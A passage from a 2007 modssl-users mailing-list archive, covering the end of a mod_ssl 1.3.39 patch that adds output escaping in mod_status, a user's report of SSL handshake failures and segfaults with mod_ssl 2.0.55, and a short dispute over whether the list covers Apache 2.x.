http://scclick.internetseer.com/sitecheck/clickthrough.jsp?I5s57e5j5m5f5m5m= 5j53M5pHwPpg0xWS5aUzRPz5tNIVWzC5dIzL52W5sMPTN5n5e5bUKT5bNIVWzC5dIzL5bVw6vx5= e5e5b5n5bxWS6sX6tw5dMPNS53T5p5f=3De3 Sincerely, Cindy Jordan Web Site Analyst InternetSeer.com "Free Website Monitoring" http://www.internetseer.com/ep/setoc?NR5p764lad5aP5q5eMNNV5cSHVMU5bGxy=3De3 ---------------------------------------------------------------------------= ------- If you prefer not to receive any further alerts regarding the availability = of your Web site, click this link:=20 http://scclick.internetseer.com/sitecheck/cancel.jsp?Hw_573txWS5aUzRPz5tNIV= WzC5dIzL.e3=20 or reply to this message with the word "cancel" in the subject line. ##modssl-users@modssl.org## SRC=3D29 ------=_Part_13335_4870674.1016082232430 Content-Type: text/html Content-Transfer-Encoding: 7bit InternetSeer \n\n"); else +#ifndef NO_PRETTYPRINT -+ ap_rprintf(r, -+ "\n\n", -+ score_record.client, -+ vhost ? vhost->server_hostname : "(unavailable)", -+ ap_escape_html(r->pool, score_record.request)); ++ ap_rprintf(r, ++ "\n\n", ++ score_record.client, ++ vhost ? vhost->server_hostname : "(unavailable)", ++ ap_escape_html(r->pool, ++ ap_escape_logitem(r->pool, score_record.request))); +#else ++ ap_rprintf(r, "\n\n", ap_escape_html(r->pool, score_record.client), - vhost ? ap_escape_html(r->pool, +@@ -660,6 +672,7 @@ vhost->server_hostname) : "(unavailable)", - ap_escape_html(r->pool, score_record.request)); + ap_escape_html(r->pool, + ap_escape_logitem(r->pool, score_record.request))); +#endif } /* no_table_report */ } /* !short_report */ diff -PurN mod_ssl-2.8.28-1.3.37/pkg.sslmod/libssl.version mod_ssl-2.8.28-1.3.39/pkg.sslmod/libssl.version --- mod_ssl-2.8.28-1.3.37/pkg.sslmod/libssl.version 2006-07-28 09:56:52.000000000 -0400 +++ mod_ssl-2.8.28-1.3.39/pkg.sslmod/libssl.version 2007-09-10 13:35:39.000000000 -0400 @@ -1 +1 @@ -mod_ssl/2.8.28-1.3.37 +mod_ssl/2.8.28-1.3.39 --------------080207030205060002070408-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Sep 11 16:23:29 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id B2D6714D839; Tue, 11 Sep 2007 16:23:29 +0200 (CEST) X-Original-To: modssl-users@modssl.org Delivered-To: modssl-users@modssl.org Received: from KEXCHANGE.knet.kzoo.edu (kexchange.knet.kzoo.edu [205.234.210.114]) by master.modssl.org (Postfix) with ESMTP id D8A0814D843 for ; Tue, 11 Sep 2007 16:23:28 +0200 (CEST) x-mimeole: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C7F47F.4E3D277A" Subject: Mod-ssl and Apache Date: Tue, 11 Sep 2007 10:23:18 -0400 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Mod-ssl and Apache Thread-Index: Acf0f0zFp55gOgt1QaubuErRCM0mfA== From: "Aaron Smith" To: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Aaron Smith" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users This is a multi-part message in MIME format. ------_=_NextPart_001_01C7F47F.4E3D277A Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: quoted-printable Not sure if these messages are getting through or not. I'm having trouble with mod_ssl 2.0.55 and apache 2.0.55. The compile and make goes fine, but when the server is running, and connections are made via SSL, the child processes segfault. If mod_ssl is compiled into the apache binary statically, the processes simple hang and build up until the server can no longer handle the load. When compiled as a shared module, the segfaults occur. Setting the loglevel to Debug results in these errors: =20 [Tue Sep 11 10:10:43 2007] [info] Connection to child 2 established (server ourserver.name.scrubbed:8040, client ) [Tue Sep 11 10:10:43 2007] [info] Seeding PRNG with 136 bytes of entropy [Tue Sep 11 10:10:43 2007] [debug] ssl_engine_io.c(1512): OpenSSL: read 11/11 bytes from BIO#401a3500 [mem: 401aabb0] (BIO dump fo llows) [Tue Sep 11 10:10:43 2007] [debug] ssl_engine_io.c(1459): +----------------------------------------------------------------------- --+ [Tue Sep 11 10:10:43 2007] [debug] ssl_engine_io.c(1484): | 0000: 80 67 01 03 01 00 4e 00-00 00 10 .g....N.... =20 | [Tue Sep 11 10:10:43 2007] [debug] ssl_engine_io.c(1490): +----------------------------------------------------------------------- --+ [Tue Sep 11 10:10:43 2007] [info] SSL library error 1 in handshake (server ourserver.name.scrubbed:8040, client ) [Tue Sep 11 10:10:43 2007] [info] SSL Library Error: 336027900 error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol speaking not SSL to HTTPS port!? [Tue Sep 11 10:10:43 2007] [info] Connection to child 2 closed with abortive shutdown(server ourserver.name.scrubbed:8040, ) =20 Thoughts anyone? =20 -Aaron=20 =20 ------_=_NextPart_001_01C7F47F.4E3D277A Content-Type: text/html; charset="US-ASCII" Content-Transfer-Encoding: quoted-printable

         =    Not sure if these messages are getting through or not.  I’m = having trouble with mod_ssl 2.0.55 and apache 2.0.55.  The compile and = make goes fine, but when the server is running, and connections are made via SSL, = the child processes segfault.  If mod_ssl is compiled into the apache = binary statically, the processes simple hang and build up until the server can = no longer handle the load.  When compiled as a shared module, the = segfaults occur.  Setting the loglevel to Debug results in these = errors:

 

[Tue Sep 11 10:10:43 2007] [info] Connection to child = 2 established (server ourserver.name.scrubbed:8040, client <client IP scrubbed>)

[Tue Sep 11 10:10:43 2007] [info] Seeding PRNG with = 136 bytes of entropy

[Tue Sep 11 10:10:43 2007] [debug] = ssl_engine_io.c(1512): OpenSSL: read 11/11 bytes from BIO#401a3500 [mem: 401aabb0] (BIO dump = fo

llows)

[Tue Sep 11 10:10:43 2007] [debug] = ssl_engine_io.c(1459): +-----------------------------------------------------------------------<= o:p>

--+

[Tue Sep 11 10:10:43 2007] [debug] = ssl_engine_io.c(1484): | 0000: 80 67 01 03 01 00 4e 00-00 00 10            = ;     .g....N....   

  |

[Tue Sep 11 10:10:43 2007] [debug] = ssl_engine_io.c(1490): +-----------------------------------------------------------------------<= o:p>

--+

[Tue Sep 11 10:10:43 2007] [info] SSL library error 1 = in handshake (server ourserver.name.scrubbed:8040, client <client IP scrubbed>)

[Tue Sep 11 10:10:43 2007] [info] SSL Library Error: 336027900 error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown = protocol

 speaking not SSL to HTTPS = port!?

[Tue Sep 11 10:10:43 2007] [info] Connection to child = 2 closed with abortive shutdown(server ourserver.name.scrubbed:8040, = <client IP scrubbed>)

 

Thoughts anyone?

 

-Aaron 

 

------_=_NextPart_001_01C7F47F.4E3D277A-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Sep 11 18:18:45 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 29AED14D84D; Tue, 11 Sep 2007 18:18:45 +0200 (CEST) X-Original-To: modssl-users@modssl.org Delivered-To: modssl-users@modssl.org Received: from rv-out-0910.google.com (rv-out-0910.google.com [209.85.198.185]) by master.modssl.org (Postfix) with ESMTP id 0D3C114D839 for ; Tue, 11 Sep 2007 18:18:43 +0200 (CEST) Received: by rv-out-0910.google.com with SMTP id k20so1349797rvb for ; Tue, 11 Sep 2007 09:18:32 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; bh=Ol1YvWikrSnety6TgYBd2+IIDqCku6XM6JvSabM9bCA=; b=VHLZw6QmMzLImvo1JL6lcrkQZzP/z3P7Zt9SVKGZKfmJsXjljGNJrC+OODYVbNej6mBO/bqmuvFNWRTDQf5C0wPJohS2Yxpw0gjkyd5okPvTo92R1aAmMfxGJMG8RTZS7+ls7P9yH55UteaZohmxy9sgEqsaUCkd6Mt/MKe5RTg= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=iomLvxCBQa+kK5PLadd6DC9Mn6QoChqPTb1GbIl2gsGgZlMNjtD9BPCBC0+vot3ans1UKZUfVaRGYQrk9x4GJK9vbnXRBWZoKXgOoTa2mSGUDf7ayna04BUYBqeQTic36yidpcRz8rkwbFmVFKFWGldNMnsYCH1mWaWAkt146XY= Received: by 10.141.202.12 with SMTP id e12mr2424269rvq.1189527511827; Tue, 11 Sep 2007 09:18:31 -0700 (PDT) Received: by 10.141.27.2 with HTTP; Tue, 11 Sep 2007 09:18:31 -0700 (PDT) Message-ID: <740f716a0709110918n1620707bgaa754fd74c245ec9@mail.gmail.com> Date: Tue, 11 Sep 2007 09:18:31 -0700 From: "Yvo van Doorn" To: modssl-users@modssl.org Subject: Re: Mod-ssl and Apache In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline References: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Yvo van Doorn" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users Considering this a mailing list for modssl 1.x not 2.x, which is part of the apache distribution... you may need to seek help on the apache mailing lists. modssl 1.x =! modssl 2.x On 9/11/07, Aaron Smith wrote: > > > > > Not sure if these messages are getting through or not. I'm > having trouble with mod_ssl 2.0.55 and apache 2.0.55. The compile and make > goes fine, but when the server is running, and connections are made via SSL, > the child processes segfault. If mod_ssl is compiled into the apache binary > statically, the processes simple hang and build up until the server can no > longer handle the load. When compiled as a shared module, the segfaults > occur. Setting the loglevel to Debug results in these errors: > > > > [Tue Sep 11 10:10:43 2007] [info] Connection to child 2 established (server > ourserver.name.scrubbed:8040, client ) > > [Tue Sep 11 10:10:43 2007] [info] Seeding PRNG with 136 bytes of entropy > > [Tue Sep 11 10:10:43 2007] [debug] ssl_engine_io.c(1512): OpenSSL: read > 11/11 bytes from BIO#401a3500 [mem: 401aabb0] (BIO dump fo > > llows) > > [Tue Sep 11 10:10:43 2007] [debug] ssl_engine_io.c(1459): > +----------------------------------------------------------------------- > > --+ > > [Tue Sep 11 10:10:43 2007] [debug] ssl_engine_io.c(1484): | 0000: 80 67 01 > 03 01 00 4e 00-00 00 10 .g....N.... > > | > > [Tue Sep 11 10:10:43 2007] [debug] ssl_engine_io.c(1490): > +----------------------------------------------------------------------- > > --+ > > [Tue Sep 11 10:10:43 2007] [info] SSL library error 1 in handshake (server > ourserver.name.scrubbed:8040, client ) > > [Tue Sep 11 10:10:43 2007] [info] SSL Library Error: 336027900 > error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown > protocol > > speaking not SSL to HTTPS port!? > > [Tue Sep 11 10:10:43 2007] [info] Connection to child 2 closed with abortive > shutdown(server ourserver.name.scrubbed:8040, ) > > > > Thoughts anyone? > > > > -Aaron > > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Sep 11 19:10:31 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 7CFF314D84D; Tue, 11 Sep 2007 19:10:31 +0200 (CEST) X-Original-To: modssl-users@modssl.org Delivered-To: modssl-users@modssl.org Received: from KEXCHANGE.knet.kzoo.edu (kexchange.knet.kzoo.edu [205.234.210.114]) by master.modssl.org (Postfix) with ESMTP id C350214D839 for ; Tue, 11 Sep 2007 19:10:30 +0200 (CEST) x-mimeole: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: quoted-printable Subject: RE: Mod-ssl and Apache Date: Tue, 11 Sep 2007 13:10:20 -0400 Message-ID: In-Reply-To: <740f716a0709110918n1620707bgaa754fd74c245ec9@mail.gmail.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Mod-ssl and Apache Thread-Index: Acf0j3mBjrZQYfO9RzSP3Cmej5O5nQABvvGw From: "Aaron Smith" To: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Aaron Smith" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users Oh! My apologies. I thought this was a mailing list for mod_ssl independent of version. -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Yvo van Doorn Sent: Tuesday, September 11, 2007 12:19 PM To: modssl-users@modssl.org Subject: Re: Mod-ssl and Apache Considering this a mailing list for modssl 1.x not 2.x, which is part of the apache distribution... you may need to seek help on the apache mailing lists. modssl 1.x =3D! modssl 2.x On 9/11/07, Aaron Smith wrote: > > > > > Not sure if these messages are getting through or not. I'm > having trouble with mod_ssl 2.0.55 and apache 2.0.55. The compile and make > goes fine, but when the server is running, and connections are made via SSL, > the child processes segfault. If mod_ssl is compiled into the apache binary > statically, the processes simple hang and build up until the server can no > longer handle the load. When compiled as a shared module, the segfaults > occur. Setting the loglevel to Debug results in these errors: > > > > [Tue Sep 11 10:10:43 2007] [info] Connection to child 2 established (server > ourserver.name.scrubbed:8040, client ) > > [Tue Sep 11 10:10:43 2007] [info] Seeding PRNG with 136 bytes of entropy > > [Tue Sep 11 10:10:43 2007] [debug] ssl_engine_io.c(1512): OpenSSL: read > 11/11 bytes from BIO#401a3500 [mem: 401aabb0] (BIO dump fo > > llows) > > [Tue Sep 11 10:10:43 2007] [debug] ssl_engine_io.c(1459): > +----------------------------------------------------------------------- > > --+ > > [Tue Sep 11 10:10:43 2007] [debug] ssl_engine_io.c(1484): | 0000: 80 67 01 > 03 01 00 4e 00-00 00 10 .g....N.... > > | > > [Tue Sep 11 10:10:43 2007] [debug] ssl_engine_io.c(1490): > +----------------------------------------------------------------------- > > --+ > > [Tue Sep 11 10:10:43 2007] [info] SSL library error 1 in handshake (server > ourserver.name.scrubbed:8040, client ) > > [Tue Sep 11 10:10:43 2007] [info] SSL Library Error: 336027900 > error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown > protocol > > speaking not SSL to HTTPS port!? > > [Tue Sep 11 10:10:43 2007] [info] Connection to child 2 closed with abortive > shutdown(server ourserver.name.scrubbed:8040, ) > > > > Thoughts anyone? > > > > -Aaron > > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Sep 11 20:43:44 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 20F8814D84D; Tue, 11 Sep 2007 20:43:44 +0200 (CEST) X-Original-To: modssl-users@modssl.org Delivered-To: modssl-users@modssl.org Received: from cr.toftum.org (cpe.atm2-0-76391.0x535ae692.bynxx16.customer.tele.dk [83.90.230.146]) by master.modssl.org (Postfix) with ESMTP id B2B7814D839 for ; Tue, 11 Sep 2007 20:43:43 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by cr.toftum.org (Postfix) with ESMTP id 0D170328F for ; Tue, 11 Sep 2007 20:43:33 +0200 (CEST) X-Virus-Scanned: amavisd-new at toftum.dk Received: from cr.toftum.org ([127.0.0.1]) by localhost (cr.toftum.org [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id JqTp05npRVug for ; Tue, 11 Sep 2007 20:43:20 +0200 (CEST) Received: by cr.toftum.org (Postfix, from userid 1000) id 5EE0919402; Tue, 11 Sep 2007 20:43:20 +0200 (CEST) Date: Tue, 11 Sep 2007 20:43:20 +0200 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Mod-ssl and Apache Message-ID: <20070911184320.GL25974@cr> Mail-Followup-To: modssl-users@modssl.org References: <740f716a0709110918n1620707bgaa754fd74c245ec9@mail.gmail.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users On Tue, Sep 11, 2007 at 01:10:20PM -0400, Aaron Smith wrote: > Oh! My apologies. I thought this was a mailing list for mod_ssl > independent of version. > It has been used for both versions over time - this is pretty much the first time anyone complained. vh Mads Toftum -- http://soulfood.dk ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Sep 11 23:50:22 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 5809414D84D; Tue, 11 Sep 2007 23:50:22 +0200 (CEST) X-Original-To: modssl-users@modssl.org Delivered-To: modssl-users@modssl.org Received: from rv-out-0910.google.com (rv-out-0910.google.com [209.85.198.190]) by master.modssl.org (Postfix) with ESMTP id 8AB7514D839 for ; Tue, 11 Sep 2007 23:50:21 +0200 (CEST) Received: by rv-out-0910.google.com with SMTP id k20so4457rvb for ; Tue, 11 Sep 2007 14:50:10 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; bh=UucvMqGKBJikiO+nXJoZsWnALRmUGT0d7z0blzD3CdY=; b=VhoOnw/AcPLJGr3hNh3Ewqusho3m+RUrsqY5bOwMWsKh2t8FMbryYwvg09YY4K1AODDEbDxcF+vKbvlLe0ditdaDcLWG/WZ/eftEGA5BBgxS6zWfteSTUu1iyOExjUMTnl0GZKvyDdQljWvLMvLZmiYs/N+hyK9tdcSmjOqNAF8= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=YiGSpzvWhXXsEOc99xcB+D1Kg7P64lC9LZdU2jCECfM9CMOu0ne4QHzFRH52MonKidq9l3ASb3wfW4AJT1VEX6X1xOmLpbK4ifUcDW5nQpI6UNPn1tIEPRHwdo++3mjjZVWp7JUbMPZb+y5kKd7826xWPKQKtE+kLPrNJIrmCZ4= Received: by 10.141.27.18 with SMTP id e18mr190954rvj.1189547410548; Tue, 11 Sep 2007 14:50:10 -0700 (PDT) Received: by 10.141.27.2 with HTTP; Tue, 11 Sep 2007 14:50:10 -0700 (PDT) Message-ID: <740f716a0709111450m3e52d56agd295d946d225a963@mail.gmail.com> Date: Tue, 11 Sep 2007 14:50:10 -0700 From: "Yvo van Doorn" To: modssl-users@modssl.org Subject: Re: Mod-ssl and Apache In-Reply-To: <20070911184320.GL25974@cr> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <740f716a0709110918n1620707bgaa754fd74c245ec9@mail.gmail.com> <20070911184320.GL25974@cr> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Yvo van Doorn" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users On 9/11/07, Mads Toftum wrote: > On Tue, Sep 11, 2007 at 01:10:20PM -0400, Aaron Smith wrote: > > Oh! My apologies. I thought this was a mailing list for mod_ssl > > independent of version. > > > It has been used for both versions over time - this is pretty much the > first time anyone complained. > > vh > > Mads Toftum > -- > http://soulfood.dk > ______________________________________________________________________ Its not really complaining, more in that modssl.org and its downloads are geared for apache 1.3.x not apache 2.x as they took incorporated modssl into the source thus you can pretty much expect better support for apache 2.x related modules, incl. modssl, on the apache mailing lists. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Sep 12 08:28:06 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id AC55A14D86A; Wed, 12 Sep 2007 08:28:06 +0200 (CEST) X-Original-To: modssl-users@modssl.org Delivered-To: modssl-users@modssl.org Received: from cr.toftum.org (cpe.atm2-0-76391.0x535ae692.bynxx16.customer.tele.dk [83.90.230.146]) by master.modssl.org (Postfix) with ESMTP id 7D7AB14D857 for ; Wed, 12 Sep 2007 08:28:06 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by cr.toftum.org (Postfix) with ESMTP id D132FC6B79 for ; Wed, 12 Sep 2007 08:27:55 +0200 (CEST) X-Virus-Scanned: amavisd-new at toftum.dk Received: from cr.toftum.org ([127.0.0.1]) by localhost (cr.toftum.org [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id 4op3XxMz0Eji for ; Wed, 12 Sep 2007 08:27:44 +0200 (CEST) Received: by cr.toftum.org (Postfix, from userid 1000) id 31E2A14975; Wed, 12 Sep 2007 08:27:44 +0200 (CEST) Date: Wed, 12 Sep 2007 08:27:44 +0200 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Mod-ssl and Apache Message-ID: <20070912062743.GM25974@cr> Mail-Followup-To: modssl-users@modssl.org References: <740f716a0709110918n1620707bgaa754fd74c245ec9@mail.gmail.com> <20070911184320.GL25974@cr> <740f716a0709111450m3e52d56agd295d946d225a963@mail.gmail.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <740f716a0709111450m3e52d56agd295d946d225a963@mail.gmail.com> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users On Tue, Sep 11, 2007 at 02:50:10PM -0700, Yvo van Doorn wrote: > Its not really complaining, more in that modssl.org and its downloads > are geared for apache 1.3.x not apache 2.x as they took incorporated > modssl into the source thus you can pretty much expect better support > for apache 2.x related modules, incl. modssl, on the apache mailing > lists. We did actually create a list for modssl over at httpd.apache.org, but so far there's been no valid traffic (note to self: put the list on http://httpd.apache.org/lists.html or shut it down). vh Mads Toftum -- http://soulfood.dk ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Sep 12 10:56:13 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 9D02D14D872; Wed, 12 Sep 2007 10:56:13 +0200 (CEST) X-Original-To: modssl-users@modssl.org Delivered-To: modssl-users@modssl.org Received: from web25405.mail.ukl.yahoo.com (web25405.mail.ukl.yahoo.com [217.12.10.139]) by master.modssl.org (Postfix) with SMTP id 26A7A14D857 for ; Wed, 12 Sep 2007 10:56:12 +0200 (CEST) Received: (qmail 90240 invoked by uid 60001); 12 Sep 2007 08:55:52 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.co.uk; h=X-YMail-OSG:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID; b=T++GbqGfqHveNhePZSwBhulMacpTkzdgDx+3zYL6qiiY0LZHySfYBrHS1C/HDXxvCMGD1gZoR1XHS6R3HCO1mFk5Jf0T4Vbf6m3PXxddIWrv1hVxcKmbUYzjP53UapZoUOnG5fs6NUywObNJegE4voJ9NE1Z7PMODyt4fj22aZY=; X-YMail-OSG: LXzNQmUVM1nmhV7KGDc5basJvd2BUtrbz8o13yD3lIfwOcISe9zRe2L2bfKABfx7sjAZ_whyO2hznUTOngQffxy9IGvsDutJn8h1lmLlnrAXX8zo6a9Kph6KRlQQSP5fBFB5XqE- Received: from [83.166.184.142] by web25405.mail.ukl.yahoo.com via HTTP; Wed, 12 Sep 2007 09:55:52 BST Date: Wed, 12 Sep 2007 09:55:52 +0100 (BST) From: Glyn Astill Subject: RE: Mod-ssl and Apache To: modssl-users@modssl.org In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Message-ID: <425569.89056.qm@web25405.mail.ukl.yahoo.com> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Glyn Astill X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users "Considering this a mailing list for modssl 1.x not 2.x" That's b*****ks, the modssl.org site clearly has the latest version stated as 2.8.30 and the only link for a users mailing list is this one. Perhaps you'd like to inform us which list is for which version? --- Aaron Smith wrote: > > > Oh! My apologies. I thought this was a mailing list for mod_ssl > independent of version. > > -----Original Message----- > From: owner-modssl-users@modssl.org > [mailto:owner-modssl-users@modssl.org] On Behalf Of Yvo van Doorn > Sent: Tuesday, September 11, 2007 12:19 PM > To: modssl-users@modssl.org > Subject: Re: Mod-ssl and Apache > > Considering this a mailing list for modssl 1.x not 2.x, which is > part > of the apache distribution... you may need to seek help on the > apache > mailing lists. > > modssl 1.x =! modssl 2.x > > On 9/11/07, Aaron Smith wrote: > > > > > > > > > > Not sure if these messages are getting through or > not. > I'm > > having trouble with mod_ssl 2.0.55 and apache 2.0.55. The > compile and > make > > goes fine, but when the server is running, and connections are > made > via SSL, > > the child processes segfault. If mod_ssl is compiled into the > apache > binary > > statically, the processes simple hang and build up until the > server > can no > > longer handle the load. When compiled as a shared module, the > segfaults > > occur. Setting the loglevel to Debug results in these errors: > > > > > > > > [Tue Sep 11 10:10:43 2007] [info] Connection to child 2 > established > (server > > ourserver.name.scrubbed:8040, client ) > > > > [Tue Sep 11 10:10:43 2007] [info] Seeding PRNG with 136 bytes of > entropy > > > > [Tue Sep 11 10:10:43 2007] [debug] ssl_engine_io.c(1512): > OpenSSL: > read > > 11/11 bytes from BIO#401a3500 [mem: 401aabb0] (BIO dump fo > > > > llows) > > > > [Tue Sep 11 10:10:43 2007] [debug] ssl_engine_io.c(1459): > > > +----------------------------------------------------------------------- > > > > --+ > > > > [Tue Sep 11 10:10:43 2007] [debug] ssl_engine_io.c(1484): | 0000: > 80 > 67 01 > > 03 01 00 4e 00-00 00 10 .g....N.... > > > > | > > > > [Tue Sep 11 10:10:43 2007] [debug] ssl_engine_io.c(1490): > > > +----------------------------------------------------------------------- > > > > --+ > > > > [Tue Sep 11 10:10:43 2007] [info] SSL library error 1 in > handshake > (server > > ourserver.name.scrubbed:8040, client ) > > > > [Tue Sep 11 10:10:43 2007] [info] SSL Library Error: 336027900 > > error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown > > protocol > > > > speaking not SSL to HTTPS port!? > > > > [Tue Sep 11 10:10:43 2007] [info] Connection to child 2 closed > with > abortive > > shutdown(server ourserver.name.scrubbed:8040, scrubbed>) > > > > > > > > Thoughts anyone? > > > > > > > > -Aaron > > > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) > www.modssl.org > User Support Mailing List > modssl-users@modssl.org > Automated List Manager > majordomo@modssl.org > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) > www.modssl.org > User Support Mailing List > modssl-users@modssl.org > Automated List Manager > majordomo@modssl.org > ___________________________________________________________ Want ideas for reducing your carbon footprint? Visit Yahoo! For Good http://uk.promotions.yahoo.com/forgood/environment.html ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Sep 12 11:09:54 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 4E1D314D882; Wed, 12 Sep 2007 11:09:54 +0200 (CEST) X-Original-To: modssl-users@modssl.org Delivered-To: modssl-users@modssl.org Received: from cr.toftum.org (cpe.atm2-0-76391.0x535ae692.bynxx16.customer.tele.dk [83.90.230.146]) by master.modssl.org (Postfix) with ESMTP id 108FE14D85E for ; Wed, 12 Sep 2007 11:09:53 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by cr.toftum.org (Postfix) with ESMTP id ACF06A85DD for ; Wed, 12 Sep 2007 11:09:43 +0200 (CEST) X-Virus-Scanned: amavisd-new at toftum.dk Received: from cr.toftum.org ([127.0.0.1]) by localhost (cr.toftum.org [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id 2mSM8ll0PGZr for ; Wed, 12 Sep 2007 11:09:31 +0200 (CEST) Received: by cr.toftum.org (Postfix, from userid 1000) id DF7B87F1C2; Wed, 12 Sep 2007 11:09:20 +0200 (CEST) Date: Wed, 12 Sep 2007 11:09:17 +0200 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Mod-ssl and Apache Message-ID: <20070912090916.GN25974@cr> Mail-Followup-To: modssl-users@modssl.org References: 